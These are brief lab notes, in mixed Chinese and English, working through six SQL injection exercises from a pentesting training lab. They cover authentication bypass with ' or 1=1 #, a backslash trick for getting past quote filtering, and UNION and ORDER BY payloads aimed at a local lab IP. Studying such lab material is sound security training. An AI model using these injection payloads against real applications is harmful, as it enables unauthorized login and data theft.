pentestlab II web injection

example 1:SELECT * FROM users WHERE username='' AND password='' 简单注入，用' or 1=1 # 闭合语句，井号忽略后面语句

SELECT * FROM users WHERE username='' or 1=1 # ' AND password=''

example 2:' or 1=1 #没有报错，要求只能返回一个值，使用LIMIT限制 ' or 1=1 LIMIT 1 #

SELECT * FROM users WHERE username='' or 1=1 LIMIT 1 # ' AND password=''

example 3：输入单引号无报错，过滤了单引号，利用反斜杠 \ 忽略下一个单引号的特性，即反斜杠后的单引号被过滤，第一个单引号和第三个单引号闭合。用井号将后面过滤

SELECT * FROM users WHERE username='\' AND password=' or 1=1 #'

example 4;http://192.168.56.101/sqlinjection/example4/?req=username%3d%27hacker%27如图，那么在URL中，构造

http://192.168.56.101/sqlinjection/example4/?req=username%3d%27' or 1=1 #%27

example 5:LIMIT 限制  利用union注入

http://192.168.56.101/sqlinjection/example5/?limit=4%20union%20select%201,2,3

example 6:http://192.168.56.101/sqlinjection/example6/?group=username order 3

http://192.168.56.101/sqlinjection/example6/?group=username union select 1,2,3